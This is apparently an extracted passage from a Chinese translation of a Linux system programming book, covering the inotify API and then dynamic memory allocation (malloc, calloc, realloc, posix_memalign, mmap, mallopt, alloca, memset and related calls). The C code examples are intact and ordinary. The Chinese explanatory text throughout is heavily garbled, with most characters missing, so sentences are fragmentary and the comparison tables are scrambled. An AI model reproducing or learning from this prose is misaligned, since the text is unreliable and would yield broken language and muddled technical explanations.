inotify内能件时(push程。文件
内 Nautilus。 Nautilus 出的示
的文件。
的程文件件。备工工。
– 246 –
7
文件理
inotify 能程进实时操作文件或写时以
更新备或。
inotify dnotify。 dnotify 的的的
文件。相对 dnotify , 程更 inotify。 inotify
内 2.6.13 程操作文件时的操作( select()
poll() inotify , 。我们
inotify。
7.7.1 初始化 inotify
inotify 进程对。调 inotify init()
inotify 实的文件
#include <inotify.h>
int inotify_init (void);
时 inotify init() -1设 errno
EMFILE
inotify 的实。
ENFILE
文件的。
ENOMEM 内存。
我们对 inotify 进以
int fd;
fd = inotify_init ( );
if (fd == -1) {
perror (”inotify_init”);
exit (EXIT_FAILURE);
}
7.7.2 监视
进程 inotify 设。(watch descrip-
tor示 Unix 相的。
内进程何件(读写或。
– 247 –
7
文件理
inotify 以文件。时 inotify
文件(子的文件的的
件。
7.7.2.1 增加新监视
调 inotify add watch() 文件或 path 上
件 mask 实 fd
#include <inotify.h>
int inotify_add_watch (int fd, const char *path,
uint32_t mask);
时调新的。时 inotify add watch()
-1设 errno
EACCESS 读 path 的文件。的进程能读文件。
EBADF
文件 fd 效的 inotify 实。
EFAULT
效的 path 。
EINVAL
mask 效的件。
ENOMEM 内存。
ENOSPC
inotify 。
7.7.2.2 监视掩码
或 inotify 件的进或 <ino-
tify.h>
IN ACCESS
文件读。
IN MODIFY
文件写。
IN ATTRIB
文件(或扩展属性
。
IN CLOSE WRITE
文件以写式。
IN CLOSE NOWRITE 文件以写式。
IN OPEN
文件。
IN MOVED FROM
文件出。
IN MOVED TO
文件。
– 248 –
7
文件理
IN CREATE
文件。
IN DELETE
文件。
IN DELETE SELF
对。
IN MOVE SELF
对。
的件单或件
IN ALL EVENTS 的件。
IN CLOSE
及 的 件( IN CLOSE WRITE
IN CLOSE NOWRITE。
IN MOVE
及 的 件( IN MOVED FROM
IN MOVED TO。
我们存的 inotify 实新的
int wd;
wd = inotify_add_watch (fd, ”/etc”, IN_ACCESS |
IN_MODIFY);
if (wd == -1) {
perror (”inotify_add_watch”);
exit (EXIT_FAILURE);
}
子对 /etc 读写。 /etc 文件读或写
inotify 件 inotify 文件 fd fd wd 提。我们
inotify 示件。
7.7.3 inotify 事件
我们 <inotify.h> inotify event inotify 件
#include <inotify.h>
struct inotify_event {
int wd; /* watch descriptor */
uint32_t mask; /* mask of events */
uint32_t cookie; /* unique cookie */
uint32_t len; /* size of ’name’ field */
– 249 –
7
文件理
char name[]; /* null-terminated name */
};
同 inotify add watch() wd 示 mask 示
件。 wd 文件件 name 存对的
文件。 len 零。的 len name
name null 进以的 inotify event 能对
。 inotify event 的时 len
能 strlen()。
wd /home/rlove IN ACCESS。读文件 /home-
/rlove/canon 时 name 将 cannon len 将 6。相对我们时以
同 /home/rlove/canon len 将 0 name 将 0(
。
cookie 相的件。我们将。
7.7.3.1 读取 inotify 事件
inotify 件单读 inotify 实相的文件即
。 inotify 提 slurping 性性以单读读件(
read() 小。段 name 读 inotify 件的
方。
我们实 inotify 实对实的。我们读
处理的件
char
buf[BUF_LEN]__attribute__((aligned(4)));
ssize_t len, i = 0;
/* read BUF_LEN bytes’ worth of events */
len = read (fd, buf, BUF_LEN);
/* loop over every read event until none remain */
while (i < len) {
struct inotify_event *event = (struct
inotify_event *) &buf[i];
printf (”wd=%d mask=%d cookie=%d len=%d
– 250 –
7
文件理
dir=%s\n”, event->wd, event->mask,
event->cookie, event->len, (event->mask &
IN_ISDIR) ? ”yes” : ”no”);
/* if there is a name, print it */
if (event->len)
printf (”name=%s\n”, event->name);
/* update the index to the start of the next
event */
i += sizeof (struct inotify_event) + event->len;
}
inotify 文件的操作文件程能 select()
poll() epoll() 。进程单程进文件 I/O 时
inotify 件。
inotify 件。件 inotify 能件
IN IGNORED
wd 的。能
或对存时。我们将
件。
IN ISDIR
作对。(设作对文件。
IN Q OVERFLOW inotify 出。内内存内对件
的小。处理的件上
时内件将。读
小以件。
IN UNMOUNT
对的设备。对效内将
IN IGNORED 件。
能件设们。
程将处理件的。
件
/* Do NOT do this! */
if (event->mask == IN_MODIFY)
printf (”File was written to!\n”);
else if (event->mask == IN_Q_OVERFLOW)
– 251 –
7
文件理
printf (”Oops, queue overflowed!\n);
相的进
if (event->mask & IN_ACCESS)
printf (”The file was read from!\n”);
if (event->mask & IN_UNMOUNTED)
printf (”The file’s backing device was
unmounted!\n);
if (event->mask & IN_ISDIR)
printf (”The file is a directory!\n”);
7.7.3.2 关联” 移动” 事件
N MOVED FROM IN MOVED TO 件自作的
给新。” 能”
文件的程更效(程对的文件
进程将件。
我们 inotify event 的 cookie 段。
段 cookie零将件的。设进程
/bin /sbin。 /bin 7 /sbin 8。
文件 /bin/compass /sbin/compass内将 inotify 件。
件将 wd 7 mask IN MOVED FROM name com-
pass。件将 wd 8 mask IN MOVED TO name com-
pass。件 cookie 相同 12。
文件内件。件的 wd 的。
的文件或出的进程将
的件。 cookie 的件程
的。
7.7.4 高级监视选项
新的时以 mask 或
– 252 –
7
文件理
IN DONT FOLLOW 设 path 的文件或
inotify add watch()
。
IN MASK ADD
对 存 的 文 件 调 ino-
tify add watch()更新新提的 mask。
mask 设提的件的
。
IN ONESHOT
设内给对上件自
。实上单的。
IN ONLYDIR
设 提 的 对 时
。 path 文 件 调 ino-
tify add watch() 。
init.d /etc /etc/init.d 时
对 /etc/init.d 的
int wd;
/*
* Watch ’/etc/init.d’ to see if it moves, but
only if it is a
* directory and no part of its path is a symbolic
link.
*/
wd = inotify_add_watch (fd, ”/etc/init.d”,
IN_MOVE_SELF | IN_ONLYDIR | IN_DONT_FOLLOW);
if (wd == -1)
perror (”inotify_add_watch”);
7.7.5 删除 inotify 监视
实示能调 inotify rm watch( ) inotify 实
#include <inotify.h>
– 253 –
7
文件理
int inotify_rm_watch (int fd, uint32_t wd);
调 inotify rm watch() inotify 实(文件的 fd
wd 的 0。
int ret;
ret = inotify_rm_watch (fd, wd);
if (ret)
perror (”inotify_rm_watch”);
时调 -1设 errno
EBADF
效的 inotify 实 fd。
EINVAL wd 给 inotfy 实上的效。
时内 IN IGNORED 件。内
操作的时件。的文件文件
的。内 IN IGNORED。性以程
IN IGNORED 件处理对件处理。对 GNOME
s Beagle 理的上的的
的。
7.7.6 获取事件队列大小
处理件小以 inotify 实文件上 ioctl(
FIONREAD。的以示的的
unsigned int queue_len;
int ret;
ret = ioctl (fd, FIONREAD, &queue_len);
if (ret < 0)
perror (”ioctl”);
else
printf (”%u bytes pending in queue\n”,
queue_len);
– 254 –
7
文件理
的的小的件。程以
inotify event( sizeof() 的小对段 name 小的
件。然更的进程以处理的
将读的。
文件 <sys/ioctl.h> FIONREAD。
7.7.7 销毁 inotify 实例
inotify 实及的实的文件单
int ret;
/* ’fd’ was obtained via inotify_init( ) */
ret = close (fd);
if (fd == -1)
perror (”close”);
然文件内自文件进程出
时。
– 255 –
8
内存理
第 8 章
内存管理
对进程内存的。的内内
存理存(allocation内存操(manipulation的
内存 (release)。
allocate (内存的)
的的。然更的内存。然
的操作的进程的内
存何的。
将进程段内存的方以及方
的。我们将及设操作内存内的方
何内存的程内页。
8.1 进程地址空间
的操作 Linux 将的理内存。进程能
理内存上 Linux 内进程的
空间(virtual address space。空间性的 0
。
8.1.1 页和页面调度
空间页。的以及页的小(页
的小的的页的小 4K(32 ) 8K(64 )∗。
页效(invalid效 (valid) 效页(valid
page理页或存相或
上的文件。效页(invalid page
或。对效页的段。空间的。
然性实上间的小。
进程能处存的页页理内存
∗的页小原页小 ABI(程进
的。程时页小我们我
们将以。
– 256 –
8
内存理
的 页 相 。 进 程 的 页 存 理 单
(MMU页(page fault。然内存
的页。存理内存(
上同空间以内页理内
存出 (paging out) 存将的页出空间。内
将能的页出以性能。
8.1.1.1 共享和写时复制
存的页属同进程的空间能映
射同理页。同的空间(share理内存上
的。的能读的或读写的。
进程写的写页时能以。
单的内操作页的进程将
写操作的。的进程对同页读写程上的
作同步。
MMU 写操作异作内
的页的以进程进写操作。我们将方
写时(copy-on-write(COW∗。读的以效的
空间。进程写页时以页的
内工作进程自的。写时
以页单进的文件以效的进程。进
程对页写时能新的。
8.1.2 存储器区域
内将相同的页(blocks读写。
存(memory regions段(segments或映射(mappings.
进程以的存
• 文段(text segment进程的
读的。 Linux 文段读文件(程
或文件映射内存。
• 段 (stack) 进程的的的或
∗ fork() 写时子进程进程的空间。
– 257 –
8
内存理
。程的 (local variables) 的。
• 段 (data segment) (heap)进程的存空
间。段写的的小以的。空间
malloc 的 (将)。
• BSS 段∗(bss segment) 的。
同的 C 的 ( 0)。
Linux 方。段存的
的以 (ld) 实上将的存对文件。
以进文件的小。段内存时内单的
写时的原将们映射 0 的页上效的设
的。
• 空间映射文件文件自 C 或
的文件。以 /proc/self/maps或 pmap 程的出我们
能进程的映文件。
将 Linux 提的何内存、映射的。
8.2 动态内存分配
内存同以自内存理的
内存的以及的。内存进程时
的时的的小时
。作程程的空间或
内存的时间内存。文件
或的存内存的时。文件的小以及内的
的的小的程读
内存。
C 提内存的。 C 提内存
struct pirate ship 的提内存
空间存 pirate ship。程对内存进操作
子 struct pirate ship*。
C 的内存的 malloc():
∗的原 block started by symbol 。
– 258 –
8
内存理
#include <stdlib.h>
void *malloc (size_t size);
调 malloc() 时 size 小的内存
内存的。内存的内的自 0.
时 malloc() NULL设 errno ENOMEM。
malloc() 的单的子。小的内存
char *p;
/* give me 2 KB! */
p = malloc (2048);
if (!p)
perror (”malloc”);
或空间存
struct treasure_map *map;
/*
* allocate enough memory to hold a treasure_map
stucture
* and point ’map’ at it
*/
map = malloc (sizeof (struct treasure_map));
if (!map)
perror (”malloc”);
调时 C 自的 void 的。
以子调时将 malloc() 的。
C++ 提自的。 C++ 的对
malloc() 的作:
char *name;
/* allocate 512 bytes */
name = (char *) malloc (512);
if (!name)
– 259 –
8
内存理
perror (”malloc”);
C 的程喜将( malloc的
void。我对。的
void 的时出。更的的
时的 BUG∗。 malloc 时
能。
malloc 以 NULL对的程
的。程的 malloc() malloc() NULL
时程。程们作 xmalloc()
/* like malloc(), but terminates on failure */
void *xmalloc (size_t size)
{
void *p;
p = malloc (size);
if (!p) {
perror (”xmalloc”);
exit (EXIT_FAILURE);
}
return p;
}
8.2.1 数组分配
的内存小的时内存将更。
内存的子。时的小的
的。处理 C 提 calloc()
#include <stdlib.h>
void *calloc (size_t nr, size_t size);
∗的 int 的。 Int 的自的以
。。
– 260 –
8
内存理
调 calloc() 时以存的内存
(nr size )。以内存方式的内存小
的(能的
int *x, *y;
x = malloc (50 * sizeof (int));
if (!x) {
perror (”malloc”);
return -1;
}
y = calloc (50, sizeof (int));
if (!y) {
perror (”calloc”);
return -1;
}
的的。 malloc 同的 calloc 将的
0 进。 y 的 50 0 x 的
的。程上给的 50 程
calloc() 的的。的进
0 0 的。
0 的内存即内存存
的。的我们 memset 提的
内存的。 calloc 更内以提 0 的内
存。
时 malloc() calloc() NULL设 errno
ENOMEM。
我们 C 提 calloc 以的以及
。以们自的
/* works identically to malloc( ), but memory is
zeroed */
void *malloc0 (size_t size)
– 261 –
8
内存理
{
return calloc (1, size);
}
我们以方的将 malloc0 我们的 xmalloc
/* like malloc( ), but zeros memory and
terminates on failure */
void *xmalloc0 (size_t size)
{
void *p;
p = calloc (1, size);
if (!p) {
perror (”xmalloc0”);
exit (EXIT_FAILURE);
}
return p;
}
8.2.2 调整已分配内存大小
C 提(或小的内存的
小
#include <stdlib.h>
void *realloc (void *ptr, size_t size);
调 realloc() 将 ptr 的内存的小 size 。
新空间的扩内存的时的能 ptr。
realloc 能的空间上 size 小 size
小的空间将原的新空间然将的空间。何
新的小的原内存的内。
的操作以扩原的 realloc() 操作能相时的。
size 0效 ptr 上调 free() 相同。
– 262 –
8
内存理
ptr NULL malloc() 。 ptr NULL 的
调的 malloc(), calloc(), 或 realloc() 的。的时
realloc() NULL 设 errno ENOMEM。时 ptr 的内存
。
我们原存的。我们 calloc()
的空间存 map 的 struct map *p;
/* allocate memory for two map structures */
p = calloc (2, sizeof (struct map));
if (!p) {
perror (”calloc”);
return -1;
}
/* use p[0] and p[1]... */
我们的以我们内存的小将的空
间给 (能的操作 map 我们
的 map 时间时):
/* we now need memory for only one map */
r = realloc (p, sizeof (struct map));
if (!r) {
/* note that ’p’ is still valid! */
perror (”realloc”);
return -1;
}
/* use ’r’... */
free (r);
realloc() 调 p[0] 。的原。
realloc() p 以然的。我们
内存。方调我们 p
r( p 的空间小。我们的
时 r 。
– 263 –
8
内存理
8.2.3 动态内存的释放
自内存空间自。同的内
存将进程空间的式。程
们将的内存给。(然进程出的时
的存然存。
malloc(), calloc(), 或 realloc() 的内存的时
free() 给
#include <stdlib.h>
void free (void *ptr);
调 free() ptr 的内存。 ptr 调 malloc(), calloc(), 或
realloc() 的。能 free() 的内存
空间间的。
ptr 能 NULL时 free() 调 free() 时
ptr NULL。
我们子
void print_chars (int n, char c)
{
int i;
for (i = 0; i < n; i++) {
char *s;
int j;
/*
* Allocate and zero an i+2 element array
* of chars. Note that ’sizeof (char)’
* is always 1.
*/
s = calloc (i + 2, 1);
if (!s) {
perror (”calloc”);
break;
– 264 –
8
内存理
}
for (j = 0; j < i + 1; j++)
s[j] = c;
printf (”%s\n”, s);
/* Okay, all done. Hand back the memory. */
free (s);
}
}
n 空间 n 的
(2 n+1 (n+1 。然将的
的 c( 0将
将 s 。调 print chars() n 5 c X我们以
X
XX
XXX
XXXX
XXXXX
然的更效率的方实能
的内存的单小时我们以的
内存。
SunOS SCO 的 Unix 提 free() 的
cfree()的的能 free()
能 calloc() 相对. Linux free() 能处
理我们及的存的内存。
的然我们 cfree()。 Linux 的 free()
的。
子调 free() 的。程将存
空间给更的的 s
– 265 –
8
内存理
我们对内存进操作。我们将程内存
(memory leak)。内存以及内存的程出
的更的 C 程的小。 C 将
的内存理给程以程对的内存。
的(use-after-free。的
内存。调 free() 内存我们
能对进操作。程或
内存的。的工以 Electric Fence
valgrind∗。
8.2.4 对齐
的对 (alignment) 件的内存间的
。的小的时自然对 (naturally aligned)。
对 32bit 的的 4() 的 (
的 0), 自然对。以的小 2n
的 n 0。对的件的。
的对方的。的
对的将处理的。对对的的
的性能的。写的的时对的
的自然对。
8.2.4.1 预对齐内存的分配
C 自处理对。 POSIX
malloc(),calloc() realloc() 的内存空间对 C 的对
的。 Linux 的 32 以 8 对
64 以 16 对的。
时对更的页程的对。然
相同的工作将 I/O 或件的对
。 POSIX 1003.1d 提 posix memalign() 的
/* one or the other -- either suffices */
#define _XOPEN_SOURCE 600
∗ http://perens.com/FreeSoftware/ElectricFence/ 以及 http://valgrind.org。
– 266 –
8
内存理
#define _GNU_SOURCE
#include <stdlib.h>
int posix_memalign (void **memptr,
size_t alignment,
size_t size);
调 posix memalign()时 size 的内存
alignment 进对的。 alignment 2 的以及 void 小的
。的内存的存 memptr 0.
调时内存 memptr 的
EINVAL
2 的或 void 的。
ENOMEM 的内存满的。
的对 errno 设给
出。
posix memalign() 的内存 free() 。单
char *buf;
int ret;
/* allocate 1 KB along a 256-byte boundary */
ret = posix_memalign (&buf, 256, 1024);
if (ret) {
fprintf(stderr, ”posix_memalign: %s\n”,
strerror (ret));
return -1;
}
/* use ’buf’... */
free (buf);
更的。 POSIX posix memalign( ) BSD SunOS
提
#include <malloc.h>
void * valloc (size_t size);
– 267 –
8
内存理
void * memalign (size_t boundary, size_t size);
valloc() 的能 malloc() 的页对的。
页的小 getpagesize() 。
相 memalign() 以 boundary 对的 boundary 2
的。子的内存存 ship
页的上
struct ship *pirate, *hms;
pirate = valloc (sizeof (struct ship));
if (!pirate) {
perror (”valloc”);
return -1;
}
hms = memalign (getpagesize ( ), sizeof (struct
ship));
if (!hms) {
perror (”memalign”);
free (pirate);
return -1;
}
/* use ’pirate’ and ’hms’... */
free (hms);
free (pirate);
Linux 的内存以 free() 。的
Unix 提的
内存。出性能 free(
以上的内存。
更的上时 Linux 的程以
。 posix memalign()。 malloc() 的
满对时。
– 268 –
8
内存理
8.2.4.2 其它对齐问题
的对内存对以进扩展。
的的对将的更。对同的
进以及的时对的。
。的的对单的自然对更
的。的
• 的对的的的。
的以 4 对的 32bit 的以 4 对
。
• 对的以自的对
。以 char (能以 1 对) int (能以 4
对)自 3 作 int 以 4 对。程
们时的的空间
。以将的小进。 GCC 时
-Wpadded 以。时出。
• 的对的。
• 的对的。以对
对的对。以的自
然对的。
。处理绝的对以
的的时。然的处理
的时。
设对的对的
的时处理能对的
对。的段 c badnews 的程将 c
unsigned long 读
char greeting[] = ”Ahoy Matey”;
char *c = greeting[1];
unsigned long badnews = *(unsigned long *) c;
unsigned long 能以 4 或 8 对 c 然以 1
对。 c 进读将对。的的
– 269 –
8
内存理
同的上同小性能程。
以能处理对的内出的进程 SIGBUS
进程。我们。
的子实出的的。然实的子
们更。
8.3 数据段的管理
Unix 上提理段的。然 malloc()
的方更程。我
满的同时给自实
的的
#include <unistd.h>
int brk (void *end);
void * sbrk (intptr_t increment);
Unix 的时同
段。存的段的上段的
。的 (break) 或 (break point)。
段存自的内存映射我们映射的
。
调 brk() 设 (段的) 的 end。的时
0。的时 -1设 errno ENOMEM。
调 sbrk() 将段 increment increment 。 sbrk()
的。以 increment 0 时的的
printf(”The current break point is %p\n”,sbrk(0));
POSIX C 。的 Unix
。的程的。
– 270 –
8
内存理
8.4 匿名存储器映射
glibc 的内存段内存映射。实 malloc( ) 方
将段的小 2 的的小的的满
。单的将。相的空
的们更的。的空的以 brk(
) 将内存给。
内存(buddy memory allocation scheme。的
单的。的内存
的小时内(Internal fragmentation。内存的
率。空存满单
的空间以处理时的。同内存(
能更的或的(的存。
内存的 glibc 能将
的内存给。内存的 A B。 A
处的 B A 的 B A
glibc 能相的调。存的内存
的空空间。
glibc 将空间给∗。
。 glibc 的内存以的
。的的内存时 glibc 小段的小。
方的。
对 的 glibc 内 存 映
射。(anonymous memory mapping满。存映射
的文件的映射相文件 - 以。实
上内存映射 0 的的内存以
。以单的。映射的存
的以段内。
映射内存处
• 。程内存的时映射
内存给。
∗glibc 更进的存 arena 。
– 271 –
8
内存理
• 存映射的小的调的以设能的映射
(。
• 存的内存映射。理的。
映射
• 存映射页小的。以小页
的的空间。对小的空间的更
相对的空间的空间将更。
• 新的内存映射内存的
及何内操作。小的的。
自的 glibc 的 malloc() 段满小的
内存映射满的。的调的(
的内存 glibc 的同。
128KB 128KB 小的实相的
存映射实。
8.4.1 创建匿名存储器映射
或内存映射或写自
的内存工自的内存映射 Linux 将
单。 mmap(内存映射
munmap(
#include <sys/mman.h>
void * mmap (void *start,
size_t length,
int prot,
int flags,
int fd,
off_t offset);
int munmap (void *start, size_t length);
理文件存映射文件的存
映射更单。的。我们
子
– 272 –
8
内存理
void *p;
p = mmap (NULL, /* do not care where */
512 * 1024, /* 512 KB */
PROT_READ | PROT_WRITE, /* read/write */
MAP_ANONYMOUS | MAP_PRIVATE, /*
anonymous, private */
-1, /* fd (ignored) */
0); /* offset (ignored) */
if (p == MAP_FAILED)
perror (”mmap”);
else
/* ’p’ points at 512 KB of anonymous
memory... */
对的映射 mmap() 的子。然
程映射小的。
• start设 NULL映射以内的
上。然给 non-NULL 以的页对的
性。实上程真映射上!
• prot 同时设 PROT READ PROT WRITE 映射
读写的。能读写的空存映射的。方
将映射映射能的。
• flags 设 MAP ANONYMOUS 映射的设
MAP PRIVATE 映射的。
• MAP ANONYMOUS 设 fd offset 将的。然
更的 fd -1程的
性。
映射的内存上的。映射进
的处的页 0 进。内写时
(copy-on-write) 将内存映射 0 的页上的
。同时对的内存 memset()。实上
calloc( malloc( memset(效的原 glibc
映射 0 的映射的 calloc() 式的零
– 273 –
8
内存理
。调 munmap() 映射的内存给内。
int ret;
/* all done with ’p’, so give back the 512 KB
mapping */
ret = munmap (p, 512 * 1024);
if (ret)
perror (”munmap”);
mmap() munmap()的映射。
8.4.2 映射到 /dev/zero
Unix ( BSD) MAP ANONYMOUS
。相们的设备文件 /dev/zero 实的
方。设备文件提内存相同的。 0 的写时
页的映射存。 Linux /dev/zero 设备
以映射文件 0 的内存。实上 MAP ANONYMOUS
Linux 的程方。对的 Linux 提或
Unix 上程然以将 /dev/zero 作映射
方。文件的映射
void *p;
int fd;
/* open /dev/zero for reading and writing */
fd = open (”/dev/zero”, O_RDWR);
if (fd < 0) {
perror (”open”);
return -1;
}
/* map [0,page size) of /dev/zero */
p = mmap (NULL, /* do not care where */
getpagesize ( ), /* map one page */
– 274 –
8
内存理
PROT_READ | PROT_WRITE, /* map
read/write */
MAP_PRIVATE, /* private mapping */
fd, /* map /dev/zero */
0); /* no offset */
if (p == MAP_FAILED) {
perror (”mmap”);
if (close (fd))
perror (”close”);
return -1;
}
/* close /dev/zero, no longer needed */
if (close (fd))
perror (”close”);
/* ’p’ points at one page of memory, use it... */
映射方式的存然 munmap() 映射的。
然方设备文件以的调。
内存映射的方。
8.5 高级存储器分配
及的存操作内的的程
以。以 mallopt()
#include <malloc.h>
int mallopt (int param, int value);
调 mallopt() 将 param 的存理相的设 value。
时调 0 时 0。以
对能的。
Linux param <malloc.h>
M CHECK ACTION
MALLOC CHECK 的 (将
。
– 275 –
8
内存理
M MMAP MAX
满 存 的 存 映 射
。时能段进
映射。 0 时将
映射存的。
M MMAP THRESHOLD 映射段满存
的(以单。的时
小能
映射满存的。 0 时
映射满的段满
。
M MXFAST
Fast bin 的小(以单。 Fast bins
的内存的内存
给以满的内
存。 0 时 fasy bin 将。
M TOP PAD
调 段 的 的 (padding
。 glibc brk() 段的小时
能更的内存调 brk() 的
能性。相 glibc 段的时
的内存将的给。
的。 0 时。
XPG mallopt(), :M GRAIN, M KEEP,
M NLBLKS。 Linux 实上何作。 8-1
们的以及的。
– 276 –
8
内存理
效
M CHECK ACTION
Linux
0
0-2
M GRAIN
XPG
Linux
>=0
M KEEP
XPG
Linux
>=0
M MMAP MAX
Linux
64*1024
>=0
0 mmap()
M MMAP THRESHOLD
Linux
128*1024
>=0
0
M MXFAST
XPG
64
0-80
0 fast bin
M NLBLK
XPG
Linux
>=0
M TOP PAD
Linux
0
>=0
0
程调 malloc() 或内存 mallopt()方
单
/* use mmap( ) for all allocations over 64 KB */
ret = mallopt (M_MMAP_THRESHOLD, 64 * 1024);
if (!ret)
fprintf (stderr, ”mallopt failed!\n”);
8.5.1 使用 malloc usable size() 和 malloc trim() 进行调优
Linux 提 glibc 内存的。
程内存
#include <malloc.h>
size_t malloc_usable_size (void *ptr);
调 malloc usable size() 时 ptr 的内存的实小。
glibc 能扩内存存的或映射存
的空间能的。然能的小。
的子
size_t len = 21;
size_t size;
char *buf;
– 277 –
8
内存理
buf = malloc (len);
if (!buf) {
perror (”malloc”);
return -1;
}
size = malloc_usable_size (buf);
/* we can actually use ’size’ bytes of ’buf’... */
程 glibc 的的内存给内
#include <malloc.h>
int malloc_trim (size_t padding);
调 malloc trim() 时 段 能
。然 1。时 0。空的内存
M TRIM THRESHOLD 时 glibc 自。 M TOP PAD
作。将调以的方。们
的将 glibc 内存的给的程。
8.6 调试内存分配
程以设 MALLOC CHECK 存的调
能。的调以内存的效率的然
的调段的。
能调新的程。
以单的
$ MALLOC_CHECK_=1 ./rudder
设 0存。设 1
出出 stderr。设 2进程即 abort( ) 。
MALLOC CHECK 的程的以 setuid 程
。
8.6.1 获得统计数据
Linux 提 mallinfo() 存的
– 278 –
8
内存理
#include <malloc.h>
struct mallinfo mallinfo (void);
mallinfo() 的调将存 mallinfo 。
的。的段 <malloc.h> 。
/* all sizes in bytes */
struct mallinfo {
int arena; /* 的段的小malloc */
int ordblks; /* 空的 */
int smblks; /* fast bin 的 */
int hblks; /* 映射的 */
int hblkhd; /* 映射的小 */
int usmblks; /* */
int fsmblks; /* 的fast 的小bin */
int uordblks; /* 的的空间 */
int fordblks; /* 的小 */
int keepcost; /* 的空间的小 */};
单
struct mallinfo m;
m = mallinfo();
printf (”free chunks: %d\n”, m.ordblks);
Linux 提 stats() 将内存相的
出(stderr
#include <malloc.h>
void malloc_stats (void);
内存操作的程调的:
Arena 0:
system bytes = 865939456
in use bytes = 851988200
– 279 –
8
内存理
Total (incl. mmap):
system bytes = 3216519168
in use bytes = 3202567912
max mmap regions = 65536
max mmap bytes = 2350579712
8.7 基于栈的分配
我们的的内存存
映射实的。我们自然的们映射
的。程空间的存程的自
(automatic variables的。
然程能进内存理的。
出的单的。实
内存调 alloca()
#include <alloca.h>
void * alloca (size_t size);
调 alloca()时 size 小的内存。内存
的调的( main 时, 内存将自
。的实时 NULL时 alloca()
能或能。出的出。
malloc() (实上能的内存。以
示 (能 /etc) 给的文件
时。新的
然将提的文件的
int open_sysconf (const char *file, int flags,
int mode)
{
const char *etc = SYSCONF_DIR; /* ”/etc/” */
char *name;
name = alloca (strlen (etc) + strlen (file) +
– 280 –
8
内存理
1);
strcpy (name, etc);
strcat (name, file);
return open (name, flags, mode);
}
open sysconf 时 alloca() 的内存的自
。调 alloca() 的能 alloca() 的
内存然何工作以。
malloc() 实的相同的
int open_sysconf (const char *file, int flags,
int mode)
{
const char *etc = SYSCONF_DIR; /* ”/etc/” */
char *name;
int fd;
name = malloc (strlen (etc) + strlen (file) +
1);
if (!name) {
perror (”malloc”);
return -1;
}
strcpy (name, etc);
strcat (name, file);
fd = open (name, flags, mode);
free (name);
return fd;
}
的能 alloca() 的内存作调的
的内存存的。
的
– 281 –
8
内存理
/* DO NOT DO THIS! */
ret = foo (x, alloca (10));
alloca() 的。或出
的。小小的 alloca() 出
出程。 alloca() 存。出
们对 alloca() 的。
以性 alloca()。然 Linux
上 alloca() 们的工。的异
出( alloca() 进内存单)
malloc() 的性能。对 Linux 小的内存 alloca() 能
的性能。
8.7.1 栈中的复制串
alloca() 的时。
/* we want to duplicate ’song’ */
char *dup;
dup = alloca (strlen (song) + 1);
strcpy (dup, song);
/* manipulate ’dup’... */
return; /* ’dup’ is automatically freed */
以及 alloca() 实的效 Linux 提
strdup() 将给的
#define _GNU_SOURCE
#include <string.h>
char * strdupa (const char *s);
char * strndupa (const char *s, size_t n);
调 strdupa( ) s 的。 strndupa() 将 s 的 n 。
s n s n 然自上空。
alloca() 的。调时的自。 POSIX
alloca( ) strdupa( )或 strndupa( ) 们的操作的
– 282 –
8
内存理
。性。然 Linux 上
alloca() 以及的的以单的
内存方性能上的提单的
内存的方式。
8.7.2 变长数组
C99 进(VLAs的时的
的时。。 GNUC C99 将
对的的。 VLAs alloca() 相
的方存的。的方的
for (i = 0; i < n; ++i) {
char foo[i + 1];
/* use ’foo’... */
}
段 foo i+1 char 的。 foo
的时自。我们 alloca()
VLA内存空间将时。 VLA
内存。以 VLA n alloca()
n*(n+1)/2 。我们能写我们的
open sysconf()
int open_sysconf (const char *file, int flags,
int mode)
{
const char *etc; = SYSCONF_DIR; /* ”/etc/” */
char name[strlen (etc) + strlen (file) + 1];
strcpy (name, etc);
strcat (name, file);
return open (name, flags, mode);
}
– 283 –
8
内存理
alloca() 的的内存程
存的内存出作。的方式
。 for 我们能空间以何作的
小内存的(我们的内存。然
出原我们空间能的 alloca()
然更理的。
单 alloca() 给程异的
。的。
8.8 选择一个合适的内存分配机制
内存的方式能程们
的。的 malloc()
的。然方更。 8-2
内存理的原
– 284 –
8
内存理
方式
malloc()
单方
的内存零
calloc()
0 内存
空间时
realloc()
调的空间小
能调空间
的小
brk() sbrk()
对进
对
内存映射
单
调提
空间的
小 。 时
malloc() 自内
存映射
posix memalign()
的内存何理
的小进对
相对新性
对 对
的 的 时
memalign()
valloc()
相 posix memalign()
的 Unix 上更
POSIX 对 对
的 能
posix memalign()
alloca()
的方式
的小对小
的
能
Unix
上
alloca() 出
空间
时
能
alloca() 的方
式更 Unix
alloca()
我们能以上方式的: 自。
时以及单的程们
以及内存。
– 285 –
8
内存理
8.9 存储器操作
C 提进内存操作。的能操作
( strcmp() 以及 strcpy()) 们处理的对提的内存
以 NULL 的。。
程的, 的内存作的将的
段。
8.9.1 字节设置
的内存操作的 memset()
#include <string.h>
void * memset (void *s, int c, size_t n);
调 memset() 将 s 的 n 设 c s。
将内存零
/* zero out [s,s+256) */
memset (s, ’\0’, 256);
bzero() BSD 的相同能的。新的
memset() Linux 出对的性的提
bzero()
#include <strings.h>
void bzero (void *s, size_t n);
的调能 memset() 的子
bzero (s, 256);
bzero()( b 的) 文件 <strings.h>
<string.h>。
以 calloc() 内存 memset()
。 malloc() 内存上 memset() 进
– 286 –
8
内存理
零。然能的将调
零的空间 calloc() 更。处
调 calloc() 内存零的内存然工
的将零效。
8.9.2 字节比较
strcmp() 相 memcmp() 内存相
#include <string.h>
int memcmp (const void *s1, const void *s2,
size_t n);
调 memcmp() s1 s2 的 n 内存相同 0
s1 小 s2 小 0 的 0 的。
BSD 同提自能的
#include <strings.h>
int bcmp (const void *s1, const void *s2, size_t
n);
调 bcmp() s1 s2 的 n 内存 0
0 。的存(的对
memcmp() 或 bcmp() 相的。同的
实能的内相。的
的
/* are two dinghies identical? (BROKEN) */
int compare_dinghies (struct dinghy *a, struct
dinghy *b)
{
return memcmp (a, b, sizeof (struct dinghy));
}
程们能的
。方实的工作然的 memcmp()
– 287 –
8
内存理
/* are two dinghies identical? */
int compare_dinghies (struct dinghy *a, struct
dinghy *b)
{
int ret;
if (a->nr_oars < b->nr_oars)
return -1;
if (a->nr_oars > b->nr_oars)
return 1;
ret = strcmp (a->boat_name, b->boat_name);
if (ret)
return ret;
/* and so on, for each member... */
}
8.9.3 字节移动
memmove() src 的 n dst dst
#include <string.h>
void * memmove (void *dst, const void *src,
size_t n);
同 BSD 提的实相同的能
#include <strings.h>
void bcopy (const void *src, void *dst, size_t n);
出的的相同们的的
bcopy() 的的。
bcopy() memmove() 以处理内存( dst 的
src 。们内存给的内上或
。然程。以 C
